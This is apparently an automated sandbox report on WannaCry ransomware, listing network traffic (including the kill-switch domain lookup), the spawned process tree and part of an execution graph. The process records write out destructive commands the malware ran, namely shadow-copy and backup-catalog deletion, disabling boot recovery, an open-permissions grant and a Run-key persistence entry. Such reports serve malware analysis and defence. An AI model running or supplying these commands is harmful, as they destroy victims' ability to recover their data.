May 12, 2017 18:55:35.765496969 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:35.945995092 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:35.950969934 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:35.950994015 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:36.086297989 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:36.086321115 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:36.113135099 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:36.320723057 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:36.349695921 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:36.354161978 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:36.392457008 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:36.568617105 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:36.575062037 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:36.575086117 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:36.764846087 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:36.769810915 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:36.769836903 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:36.886374950 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:55:36.937793016 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:36.944946051 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:36.944973946 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:37.080099106 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:37.080120087 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:37.086838007 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:55:37.563237906 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:37.773891926 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:37.773914099 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:37.780647039 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:37.780689001 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:37.850553036 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:38.005860090 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:38.005886078 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:38.005986929 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:38.015074015 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:38.039294958 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:38.039345026 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:38.083997965 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:38.084033012 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:38.435830116 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:38.442476034 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:38.442506075 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:38.601113081 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:38.610366106 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:38.610455990 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:38.618362904 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:38.618382931 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:38.618519068 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:38.618535995 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:38.777766943 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:38.993335009 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:39.065876961 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:39.071255922 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:39.071285009 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:39.080955029 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:39.080985069 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:39.217344999 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:39.226099014 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:39.226149082 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:39.375935078 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:39.381808996 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:39.381839991 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:39.508733034 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:39.519222021 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:39.519265890 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:39.651227951 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:39.659874916 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:39.659919024 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:39.819580078 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:39.826221943 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:39.826268911 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:40.108999014 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:40.320941925 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:40.320967913 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:40.334670067 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:40.334719896 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:40.395478964 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:40.398683071 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:40.398725986 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:40.674928904 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:40.883812904 CEST491989001192.168.1.1679.137.85.71

UDP Packets

TimestampSource PortDest PortSource IPDest IP
May 12, 2017 18:53:26.864295959 CEST5327853192.168.1.168.8.8.8
May 12, 2017 18:53:27.081289053 CEST53532788.8.8.8192.168.1.16
May 12, 2017 18:53:48.703721046 CEST6405253192.168.1.168.8.8.8
May 12, 2017 18:53:48.863464117 CEST53640528.8.8.8192.168.1.16

DNS Queries

TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
May 12, 2017 18:53:26.864295959 CEST192.168.1.168.8.8.80x288dStandard query (0)www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.comA (IP address)IN (0x0001)
May 12, 2017 18:53:48.703721046 CEST192.168.1.168.8.8.80xaf4aStandard query (0)www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.comA (IP address)IN (0x0001)

DNS Answers

TimestampSource IPDest IPTrans IDReplay CodeNameCNameAddressTypeClass
May 12, 2017 18:53:27.081289053 CEST8.8.8.8192.168.1.160x288dNo error (0)www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com144.217.74.156A (IP address)IN (0x0001)
May 12, 2017 18:53:48.863464117 CEST8.8.8.8192.168.1.160xaf4aNo error (0)www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com144.217.74.156A (IP address)IN (0x0001)

HTTP Request Dependency Graph

  • www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com

HTTP Packets

TimestampSource PortDest PortSource IPDest IPHeaderTotal Bytes Transfered (KB)
May 12, 2017 18:53:48.880690098 CEST4919180192.168.1.16144.217.74.156GET / HTTP/1.1
Host: www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com
Cache-Control: no-cache
0
May 12, 2017 18:53:49.145505905 CEST8049191144.217.74.156192.168.1.16HTTP/1.1 200 OK
Server: nginx
Date: Fri, 12 May 2017 16:53:55 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Server: sinkhole
Data Raw: 35 31 0d 0a 73 69 6e 6b 68 6f 6c 65 2e 74 65 63 68 20 2d 20 77 68 65 72 65 20 74 68 65 20 62 6f 74 73 20 70 61 72 74 79 20 68 61 72 64 20 61 6e 64 20 74 68 65 20 72 65 73 65 61 72 63 68 65 72 73 20 68 61 72 64 65 72 2e 0a 3c 21 2d 2d 20 68 32 20 2d 2d 3e 0d 0a 30 0d 0a 0d 0a
Data Ascii: 51sinkhole.tech - where the bots party hard and the researchers harder.... h2 -->0
1

HTTPS Packets

TimestampSource PortDest PortSource IPDest IPSubjectIssuerNot BeforeNot AfterRaw
May 12, 2017 18:54:27.140882969 CEST44349196131.188.40.189192.168.1.16CN=www.wo5k4yq6pd.netCN=www.esxd5zx3.comSat May 13 02:00:00 CEST 2017Tue Feb 27 00:59:59 CET 2018[[ Version: V3 Subject: CN=www.wo5k4yq6pd.net Signature Algorithm: SHA1withRSA, OID = 1.2.840.113549.1.1.5 Key: Sun RSA public key, 1024 bits modulus: 130348955944332278495135463476179956613923621181123546006454347222926688234673986325587786672443009925528186508088241506679842932983037680302150201134065144372323161965175298889391953734368072966978070622211311841661462206816295897061840542869672220784072273330727986161497303437365554754221662419527180315713 public exponent: 65537 Validity: [From: Sat May 13 02:00:00 CEST 2017, To: Tue Feb 27 00:59:59 CET 2018] Issuer: CN=www.esxd5zx3.com SerialNumber: [ 1d4880aa 8ebd1a97]] Algorithm: [SHA1withRSA] Signature:0000: 39 62 63 49 E5 24 90 99 72 BC D2 BC EA DF FE 13 9bcI.$..r.......0010: D5 EF E9 F7 92 1C A2 1A 84 A1 73 FD 08 4B 2B B5 ..........s..K+.0020: 33 79 AF FF B7 1C 9A F3 EB 9A 8E A8 6F BA 5A 33 3y..........o.Z30030: 02 98 EF 89 69 3C 60 02 82 D3 61 4A AA 73 4D 9D ....i<`...aJ.sM.0040: CA 17 C7 9E 15 BD 58 FB 4B DD D4 D9 8C 6F C4 EA ......X.K....o..0050: 62 5E 96 42 ED 78 04 E5 BD DE D1 B4 F6 18 71 5B b^.B.x........q[0060: 52 BC 48 EA 82 FA 8F 98 FA 7A 60 9D 5B 48 E1 D6 R.H......z`.[H..0070: 22 A0 A1 C6 EA 08 07 E0 E7 35 C9 A2 D5 6E 97 87 "........5...n..]
May 12, 2017 18:54:27.180291891 CEST4434919595.130.12.119192.168.1.16CN=www.nx6fem63plxi6et.netCN=www.ahmoeakkg6wqpgzpaim.comSun Mar 19 01:00:00 CET 2017Mon Oct 16 01:59:59 CEST 2017[[ Version: V3 Subject: CN=www.nx6fem63plxi6et.net Signature Algorithm: SHA1withRSA, OID = 1.2.840.113549.1.1.5 Key: Sun RSA public key, 1024 bits modulus: 166039757131007353978468688097798681485331428439975205063461910198820640958407954903539838665570875060077208757698505199342400146802980531840209644260603294063439927149581573977426693633520527390971409221569213439063986342825639198586195965076100440509478866125056621928026973875779186005158065063452795997311 public exponent: 65537 Validity: [From: Sun Mar 19 01:00:00 CET 2017, To: Mon Oct 16 01:59:59 CEST 2017] Issuer: CN=www.ahmoeakkg6wqpgzpaim.com SerialNumber: [ aaeaa4c4 4b26599b]] Algorithm: [SHA1withRSA] Signature:0000: 6F 5E 34 31 2E 39 04 C3 06 C0 46 8A 99 7D CE 86 o^41.9....F.....0010: 91 90 FB 3E A3 63 15 25 5B 79 A4 93 69 DA 22 E6 ...>.c.%[y..i.".0020: 06 39 07 47 99 D7 5E 3A FF EC 90 1F 7A 12 D2 24 .9.G..^:....z..$0030: 89 18 76 6C 45 A6 A8 5D BE 67 59 46 7E E3 D0 13 ..vlE..].gYF....0040: 4B 77 47 98 32 C4 44 DC 06 88 61 35 2B E4 E8 E5 KwG.2.D...a5+...0050: EE 20 F6 73 DF 79 BF CF 41 A5 B1 12 30 B8 42 70 . .s.y..A...0.Bp0060: 1B AE 81 CB 3D 82 D6 FB 1F FA 28 72 B3 70 11 77 ....=.....(r.p.w0070: CB 13 6C F7 F5 C6 91 56 B3 7C 32 2B EC C0 6C 87 ..l....V..2+..l.]
May 12, 2017 18:54:37.003830910 CEST4434919785.235.250.88192.168.1.16CN=www.quob4edbiuwyav4.netCN=www.377yrgafvm3.comSun Mar 19 01:00:00 CET 2017Sat Jan 27 01:00:00 CET 2018[[ Version: V3 Subject: CN=www.quob4edbiuwyav4.net Signature Algorithm: SHA1withRSA, OID = 1.2.840.113549.1.1.5 Key: Sun RSA public key, 1024 bits modulus: 127573890830678738891906455615543784186389329788517161091316481410788849418160201702144994900435174475232231071684130197848822114425637455053240693548509828937694563531565236308508817730123622807011290645972321509012043722463695916774837201574798843008797206821416515768846794231015738288916529755248182122641 public exponent: 65537 Validity: [From: Sun Mar 19 01:00:00 CET 2017, To: Sat Jan 27 01:00:00 CET 2018] Issuer: CN=www.377yrgafvm3.com SerialNumber: [ efa7449e cb5827a5]] Algorithm: [SHA1withRSA] Signature:0000: 91 61 3D 62 89 E2 30 ED 09 14 58 9F D3 32 FC B5 .a=b..0...X..2..0010: 90 EE 3B B3 0F F3 A3 9C 2A 8C 60 B8 C5 BA 34 76 ..;.....*.`...4v0020: 76 A9 DF D5 DA 66 DF 0A 48 A1 40 95 38 E0 CA 01 v....f..H.@.8...0030: 25 39 75 57 88 6C 55 0B 8F 9F 78 06 56 9C 2E 60 %9uW.lU...x.V..`0040: E8 5B 41 3B ED 7C 30 94 E0 52 6D A9 EE 4A F7 ED .[A;..0..Rm..J..0050: D3 28 7D A8 D4 B5 4B C2 C2 D3 D4 53 18 52 70 48 .(....K....S.RpH0060: C5 78 62 64 B3 96 50 D9 C4 CA AD 90 AC 14 51 05 .xbd..P.......Q.0070: 61 5A E1 0A AC 22 BE 39 3B FA 91 55 91 8F DE 14 aZ...".9;..U....]
May 12, 2017 18:54:37.204504013 CEST4434919785.235.250.88192.168.1.16CN=www.quob4edbiuwyav4.netCN=www.377yrgafvm3.comSun Mar 19 01:00:00 CET 2017Sat Jan 27 01:00:00 CET 2018[[ Version: V3 Subject: CN=www.quob4edbiuwyav4.net Signature Algorithm: SHA1withRSA, OID = 1.2.840.113549.1.1.5 Key: Sun RSA public key, 1024 bits modulus: 127573890830678738891906455615543784186389329788517161091316481410788849418160201702144994900435174475232231071684130197848822114425637455053240693548509828937694563531565236308508817730123622807011290645972321509012043722463695916774837201574798843008797206821416515768846794231015738288916529755248182122641 public exponent: 65537 Validity: [From: Sun Mar 19 01:00:00 CET 2017, To: Sat Jan 27 01:00:00 CET 2018] Issuer: CN=www.377yrgafvm3.com SerialNumber: [ efa7449e cb5827a5]] Algorithm: [SHA1withRSA] Signature:0000: 91 61 3D 62 89 E2 30 ED 09 14 58 9F D3 32 FC B5 .a=b..0...X..2..0010: 90 EE 3B B3 0F F3 A3 9C 2A 8C 60 B8 C5 BA 34 76 ..;.....*.`...4v0020: 76 A9 DF D5 DA 66 DF 0A 48 A1 40 95 38 E0 CA 01 v....f..H.@.8...0030: 25 39 75 57 88 6C 55 0B 8F 9F 78 06 56 9C 2E 60 %9uW.lU...x.V..`0040: E8 5B 41 3B ED 7C 30 94 E0 52 6D A9 EE 4A F7 ED .[A;..0..Rm..J..0050: D3 28 7D A8 D4 B5 4B C2 C2 D3 D4 53 18 52 70 48 .(....K....S.RpH0060: C5 78 62 64 B3 96 50 D9 C4 CA AD 90 AC 14 51 05 .xbd..P.......Q.0070: 61 5A E1 0A AC 22 BE 39 3B FA 91 55 91 8F DE 14 aZ...".9;..U....]

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: mssecsvc.exe PID: 3048 Parent PID: 2812

General

Start time:18:54:12
Start date:12/05/2017
Path:C:\mssecsvc.exe
Wow64 process (32bit):false
Commandline:'C:\mssecsvc.exe'
Imagebase:0x400000
File size:3723264 bytes
MD5 hash:DB349B97C37D22F5EA1D1841E3C89EB4
Programmed in:C, C++ or other language

Chronological Activities

Analysis Process: mssecsvc.exe PID: 3164 Parent PID: 444

General

Start time:18:54:34
Start date:12/05/2017
Path:C:\mssecsvc.exe
Wow64 process (32bit):false
Commandline:C:\mssecsvc.exe -m security
Imagebase:0x400000
File size:3723264 bytes
MD5 hash:DB349B97C37D22F5EA1D1841E3C89EB4
Programmed in:C, C++ or other language

Chronological Activities

Analysis Process: tasksche.exe PID: 3216 Parent PID: 3048

General

Start time:18:54:35
Start date:12/05/2017
Path:C:\Windows\tasksche.exe
Wow64 process (32bit):false
Commandline:C:\WINDOWS\tasksche.exe /i
Imagebase:0x76e20000
File size:3514368 bytes
MD5 hash:84C82835A5D21BBCF75A61706D8AB549
Programmed in:C, C++ or other language

Chronological Activities

Analysis Process: cmd.exe PID: 3232 Parent PID: 444

General

Start time:18:54:36
Start date:12/05/2017
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:cmd.exe /c 'C:\ProgramData\ywepvofkuzu108\tasksche.exe'
Imagebase:0x4a1a0000
File size:302592 bytes
MD5 hash:AD7B9C14083B52BC532FBA5948342B98
Programmed in:C, C++ or other language

Chronological Activities

Analysis Process: tasksche.exe PID: 3240 Parent PID: 3232

General

Start time:18:54:36
Start date:12/05/2017
Path:C:\ProgramData\ywepvofkuzu108\tasksche.exe
Wow64 process (32bit):false
Commandline:C:\ProgramData\ywepvofkuzu108\tasksche.exe
Imagebase:0x400000
File size:3514368 bytes
MD5 hash:84C82835A5D21BBCF75A61706D8AB549
Programmed in:C, C++ or other language

Chronological Activities

Analysis Process: attrib.exe PID: 3248 Parent PID: 3240

General

Start time:18:54:37
Start date:12/05/2017
Path:C:\Windows\System32\attrib.exe
Wow64 process (32bit):false
Commandline:attrib +h .
Imagebase:0x3f0000
File size:16384 bytes
MD5 hash:459A5755AFBB1CB3E67CA4C1296599E3
Programmed in:C, C++ or other language

Chronological Activities

Analysis Process: icacls.exe PID: 3256 Parent PID: 3240

General

Start time:18:54:37
Start date:12/05/2017
Path:C:\Windows\System32\icacls.exe
Wow64 process (32bit):false
Commandline:icacls . /grant Everyone:F /T /C /Q
Imagebase:0xbf0000
File size:27136 bytes
MD5 hash:1542A92D5C6F7E1E80613F3466C9CE7F
Programmed in:C, C++ or other language

Chronological Activities

Analysis Process: taskdl.exe PID: 3320 Parent PID: 3240

General

Start time:18:54:39
Start date:12/05/2017
Path:C:\ProgramData\ywepvofkuzu108\taskdl.exe
Wow64 process (32bit):false
Commandline:taskdl.exe
Imagebase:0x400000
File size:20480 bytes
MD5 hash:4FEF5E34143E646DBF9907C4374276F5
Programmed in:C, C++ or other language

Chronological Activities

Analysis Process: cmd.exe PID: 3336 Parent PID: 3240

General

Start time:18:54:39
Start date:12/05/2017
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\cmd.exe /c 239891494608079.bat
Imagebase:0x4a1a0000
File size:302592 bytes
MD5 hash:AD7B9C14083B52BC532FBA5948342B98
Programmed in:C, C++ or other language

Chronological Activities

Analysis Process: cscript.exe PID: 3356 Parent PID: 3336

General

Start time:18:54:40
Start date:12/05/2017
Path:C:\Windows\System32\cscript.exe
Wow64 process (32bit):false
Commandline:cscript.exe //nologo m.vbs
Imagebase:0x250000
File size:126976 bytes
MD5 hash:A3A35EE79C64A640152B3113E6E254E2
Programmed in:C, C++ or other language

Chronological Activities

Analysis Process: @WanaDecryptor@.exe PID: 3408 Parent PID: 3240

General

Start time:18:54:54
Start date:12/05/2017
Path:C:\ProgramData\ywepvofkuzu108\@WanaDecryptor@.exe
Wow64 process (32bit):false
Commandline:@WanaDecryptor@.exe co
Imagebase:0x71d90000
File size:245760 bytes
MD5 hash:7BF2B57F2A205768755C07F238FB32CC
Programmed in:C, C++ or other language

Chronological Activities

Analysis Process: cmd.exe PID: 3416 Parent PID: 3240

General

Start time:18:54:54
Start date:12/05/2017
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:cmd.exe /c start /b @WanaDecryptor@.exe vs
Imagebase:0x76e20000
File size:302592 bytes
MD5 hash:AD7B9C14083B52BC532FBA5948342B98
Programmed in:C, C++ or other language

Chronological Activities

Analysis Process: @WanaDecryptor@.exe PID: 3456 Parent PID: 3416

General

Start time:18:54:58
Start date:12/05/2017
Path:C:\ProgramData\ywepvofkuzu108\@WanaDecryptor@.exe
Wow64 process (32bit):false
Commandline:@WanaDecryptor@.exe vs
Imagebase:0x400000
File size:245760 bytes
MD5 hash:7BF2B57F2A205768755C07F238FB32CC
Programmed in:C, C++ or other language

Chronological Activities

Analysis Process: taskhsvc.exe PID: 3500 Parent PID: 3408

General

Start time:18:55:09
Start date:12/05/2017
Path:C:\ProgramData\ywepvofkuzu108\TaskData\Tor\taskhsvc.exe
Wow64 process (32bit):false
Commandline:TaskData\Tor\taskhsvc.exe
Imagebase:0x1c0000
File size:3098624 bytes
MD5 hash:FE7EB54691AD6E6AF77F8A9A0B6DE26D
Programmed in:C, C++ or other language

Chronological Activities

Analysis Process: taskse.exe PID: 3516 Parent PID: 3240

General

Start time:18:55:09
Start date:12/05/2017
Path:C:\ProgramData\ywepvofkuzu108\taskse.exe
Wow64 process (32bit):false
Commandline:taskse.exe C:\ProgramData\ywepvofkuzu108\@WanaDecryptor@.exe
Imagebase:0x751a0000
File size:20480 bytes
MD5 hash:8495400F199AC77853C53B5A3F278F3E
Programmed in:C, C++ or other language

Chronological Activities

Analysis Process: cmd.exe PID: 3528 Parent PID: 3240

General

Start time:18:55:09
Start date:12/05/2017
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v 'ywepvofkuzu108' /t REG_SZ /d '\'C:\ProgramData\ywepvofkuzu108\tasksche.exe\'' /f
Imagebase:0x4a790000
File size:302592 bytes
MD5 hash:AD7B9C14083B52BC532FBA5948342B98
Programmed in:C, C++ or other language

Chronological Activities

Analysis Process: taskdl.exe PID: 3548 Parent PID: 3240

General

Start time:18:55:09
Start date:12/05/2017
Path:C:\ProgramData\ywepvofkuzu108\taskdl.exe
Wow64 process (32bit):false
Commandline:taskdl.exe
Imagebase:0x400000
File size:20480 bytes
MD5 hash:4FEF5E34143E646DBF9907C4374276F5
Programmed in:C, C++ or other language

Chronological Activities

Analysis Process: @WanaDecryptor@.exe PID: 3568 Parent PID: 3516

General

Start time:18:55:10
Start date:12/05/2017
Path:C:\ProgramData\ywepvofkuzu108\@WanaDecryptor@.exe
Wow64 process (32bit):false
Commandline:C:\ProgramData\ywepvofkuzu108\@WanaDecryptor@.exe
Imagebase:0x76e20000
File size:245760 bytes
MD5 hash:7BF2B57F2A205768755C07F238FB32CC
Programmed in:C, C++ or other language

Chronological Activities

Analysis Process: reg.exe PID: 3584 Parent PID: 3528

General

Start time:18:55:11
Start date:12/05/2017
Path:C:\Windows\System32\reg.exe
Wow64 process (32bit):false
Commandline:reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v 'ywepvofkuzu108' /t REG_SZ /d '\'C:\ProgramData\ywepvofkuzu108\tasksche.exe\'' /f
Imagebase:0x76870000
File size:62464 bytes
MD5 hash:D69A9ABBB0D795F21995C2F48C1EB560
Programmed in:C, C++ or other language

Chronological Activities

Analysis Process: cmd.exe PID: 3628 Parent PID: 3456

General

Start time:18:55:18
Start date:12/05/2017
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
Imagebase:0x4a780000
File size:302592 bytes
MD5 hash:AD7B9C14083B52BC532FBA5948342B98
Programmed in:C, C++ or other language

Chronological Activities

Analysis Process: vssadmin.exe PID: 3660 Parent PID: 3628

General

Start time:18:55:24
Start date:12/05/2017
Path:C:\Windows\System32\vssadmin.exe
Wow64 process (32bit):false
Commandline:vssadmin delete shadows /all /quiet
Imagebase:0xd60000
File size:115200 bytes
MD5 hash:6E248A3D528EDE43994457CF417BD665
Programmed in:C, C++ or other language

Chronological Activities

Analysis Process: WMIC.exe PID: 3776 Parent PID: 3628

General

Start time:18:55:35
Start date:12/05/2017
Path:C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):false
Commandline:wmic shadowcopy delete
Imagebase:0x768d0000
File size:395776 bytes
MD5 hash:A03CF3838775E0801A0894C8BACD2E56
Programmed in:C, C++ or other language

Chronological Activities

Analysis Process: bcdedit.exe PID: 3804 Parent PID: 3628

General

Start time:18:55:36
Start date:12/05/2017
Path:C:\Windows\System32\bcdedit.exe
Wow64 process (32bit):false
Commandline:bcdedit /set {default} bootstatuspolicy ignoreallfailures
Imagebase:0x220000
File size:295936 bytes
MD5 hash:ABD373E82F6240031C1E631AA20711C7
Programmed in:C, C++ or other language

Chronological Activities

Analysis Process: bcdedit.exe PID: 3812 Parent PID: 3628

General

Start time:18:55:37
Start date:12/05/2017
Path:C:\Windows\System32\bcdedit.exe
Wow64 process (32bit):false
Commandline:bcdedit /set {default} recoveryenabled no
Imagebase:0x5c0000
File size:295936 bytes
MD5 hash:ABD373E82F6240031C1E631AA20711C7
Programmed in:C, C++ or other language

Chronological Activities

Analysis Process: wbadmin.exe PID: 3824 Parent PID: 3628

General

Start time:18:55:38
Start date:12/05/2017
Path:C:\Windows\System32\wbadmin.exe
Wow64 process (32bit):false
Commandline:wbadmin delete catalog -quiet
Imagebase:0xf20000
File size:224768 bytes
MD5 hash:EAB630E7E6A7FC248870A2FCDC098B98
Programmed in:C, C++ or other language

Chronological Activities

Analysis Process: wbengine.exe PID: 3872 Parent PID: 444

General

Start time:18:55:39
Start date:12/05/2017
Path:C:\Windows\System32\wbengine.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\wbengine.exe
Imagebase:0x190000
File size:1203200 bytes
MD5 hash:691E3285E53DCA558E1A84667F13E15A
Programmed in:C, C++ or other language

Chronological Activities

Analysis Process: taskdl.exe PID: 3900 Parent PID: 3240

General

Start time:18:55:41
Start date:12/05/2017
Path:C:\ProgramData\ywepvofkuzu108\taskdl.exe
Wow64 process (32bit):false
Commandline:taskdl.exe
Imagebase:0x400000
File size:20480 bytes
MD5 hash:4FEF5E34143E646DBF9907C4374276F5
Programmed in:C, C++ or other language

Chronological Activities

Analysis Process: taskse.exe PID: 3908 Parent PID: 3240

General

Start time:18:55:42
Start date:12/05/2017
Path:C:\ProgramData\ywepvofkuzu108\taskse.exe
Wow64 process (32bit):false
Commandline:taskse.exe C:\ProgramData\ywepvofkuzu108\@WanaDecryptor@.exe
Imagebase:0x400000
File size:20480 bytes
MD5 hash:8495400F199AC77853C53B5A3F278F3E
Programmed in:C, C++ or other language

Chronological Activities

Analysis Process: vdsldr.exe PID: 3928 Parent PID: 556

General

Start time:18:55:43
Start date:12/05/2017
Path:C:\Windows\System32\vdsldr.exe
Wow64 process (32bit):false
Commandline:C:\Windows\System32\vdsldr.exe -Embedding
Imagebase:0x8b0000
File size:19968 bytes
MD5 hash:A2551668C78CEA4089D71A0A3B36FC0C
Programmed in:C, C++ or other language

Chronological Activities

Disassembly

Code Analysis

Reset < >

    Analysis Process: mssecsvc.exe PID: 3048 Parent PID: 2812

    Execution Graph

    Execution Coverage:30.4%
    Dynamic/Decrypted Code Coverage:0%
    Signature Coverage:62.5%
    Total number of Nodes:40
    Total number of Limit Nodes:1

    Graph

    %3 64 409a16 __set_app_type __p__fmode __p__commode 65 409a85 64->65 66 409a99 65->66 67 409a8d __setusermatherr 65->67 76 409b8c _controlfp 66->76 67->66 69 409a9e _initterm __getmainargs _initterm 70 409af2 GetStartupInfoA 69->70 72 409b26 GetModuleHandleA 70->72 77 408140 InternetOpenA InternetOpenUrlA 72->77 75 409b4a exit _XcptFilter 76->69 78 4081bc InternetCloseHandle InternetCloseHandle 77->78 79 4081a7 InternetCloseHandle InternetCloseHandle 77->79 78->75 82 408090 GetModuleFileNameA __p___argc 79->82 81 4081b2 81->75 83 4080b9 OpenSCManagerA 82->83 84 4080b0 82->84 85 4080cf OpenServiceA 83->85 86 408101 StartServiceCtrlDispatcherA 83->86 93 407f20 84->93 89 4080ee 85->89 90 4080fc CloseServiceHandle 85->90 86->81 98 407fa0 ChangeServiceConfig2A 89->98 90->86 92 4080f6 CloseServiceHandle 92->90 99 407c40 sprintf OpenSCManagerA 93->99 95 407f25 104 407ce0 GetModuleHandleW 95->104 98->92 100 407c74 CreateServiceA 99->100 101 407cca 99->101 102 407cbb CloseServiceHandle 100->102 103 407cad StartServiceA CloseServiceHandle 100->103 101->95 102->95 103->102 105 407d01 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 104->105 106 407f08 104->106 105->106 107 407d49 105->107 106->81 107->106 108 407d69 FindResourceA 107->108 108->106 109 407d84 LoadResource 108->109 109->106 110 407d94 LockResource 109->110 110->106 111 407da7 SizeofResource 110->111 111->106 112 407db9 sprintf sprintf MoveFileExA CreateFileA 111->112 112->106 113 407e54 WriteFile CloseHandle CreateProcessA 112->113 113->106 114 407ef2 CloseHandle CloseHandle 113->114 114->106

    Executed Functions

    Function 00409A16, Relevance: 16.6, APIs: 11, Instructions: 111
    APIs
    • __set_app_type.MSVCRT ref: 00409A43
    • __p__fmode.MSVCRT ref: 00409A58
    • __p__commode.MSVCRT ref: 00409A66
    • __setusermatherr.MSVCRT ref: 00409A92
      • Part of subcall function 00409B8C: _controlfp.MSVCRT ref: 00409B96
    • _initterm.MSVCRT ref: 00409AA8
